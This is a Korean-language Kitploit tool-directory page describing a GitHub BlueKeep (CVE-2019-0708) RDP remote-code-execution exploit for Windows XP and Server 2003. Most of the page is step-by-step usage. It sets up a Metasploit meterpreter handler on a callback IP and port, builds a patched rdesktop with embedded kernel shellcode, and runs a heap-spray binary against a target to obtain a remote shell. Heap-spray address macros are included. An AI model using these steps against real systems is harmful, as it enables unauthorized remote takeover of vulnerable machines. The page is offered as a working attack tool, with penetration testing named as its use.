Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2019-0708_bluekeep_rce — XP (모든 버전 sp2, sp3)에서 작동합니다. | Kitploit
도구/GitHubGitHub/coolboy4me/cve-2019-0708_bluekeep_rce
Vulnerability AnalysisExploitationShellcodePenetration TestingRemote Access ToolPayload Development
GitHubcoolboy4me/cve-2019-0708_bluekeep_rce

cve-2019-0708_bluekeep_rce

XP (모든 버전 sp2, sp3)에서 작동합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
75146년 전Kitploit 검토 완료
  1. msfconsole meterpreter/multi/handler를 실행하여 192.168.116.133:6000에서 리스닝
  2. cd rdesktop-1.5.0 && make
  3. config를 수정하여 콜백 IP와 포트를 구성합니다. 192.168.116.133 6000
  4. ./heap_spray 192.168.116.134 실행 (134는 XP의 주소이며, 메모리는 2GB 이상이어야 함)
  5. msfconsole meterpreter에서 세션을 얻을 수 있습니다.

참고: shellcode/shellcode.asm은 커널 셸코드 소스입니다. 컴파일한 후 바이너리로 변환하면 rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b 파일이 됩니다. make 시 프로그램에 직접 컴파일됩니다.

현재는 XP만 지원하며, XP의 메모리가 2GB 이상이어야 합니다.

2003을 지원하려면 heap_spray.c 내의 HEAP_SPRAY_ADDRESS 매크로 주소를 수정해야 합니다. 반복 테스트 결과, 이 주소는 03의 다양한 시스템 버전과 메모리 크기에 따라 다릅니다. 하지만 자신의 기기를 테스트한다면 03에서 성공적으로 익스플로잇할 수 있습니다. 보편적이지 않습니다.

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 //자체적으로 windbg에서 힙 스프레이 셸코드 주소를 디버깅해야 합니다. 보편적인 솔루션을 찾으신 분은 issues를 제출해주세요.

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

03 테스트

  1. msfconsole meterpreter/multi/handler를 실행하여 192.168.116.133:6000에서 리스닝
  2. cd rdesktop-1.5.0 && make
  3. config를 수정하여 콜백 IP와 포트를 구성합니다. 192.168.116.133 6000
  4. ./_2003_heap_spray 192.168.116.135 실행 (135는 03의 주소이며, 메모리는 2GB 이상이어야 함)
  5. msfconsole meterpreter에서 세션을 얻을 수 있습니다.

login

도구 다운로드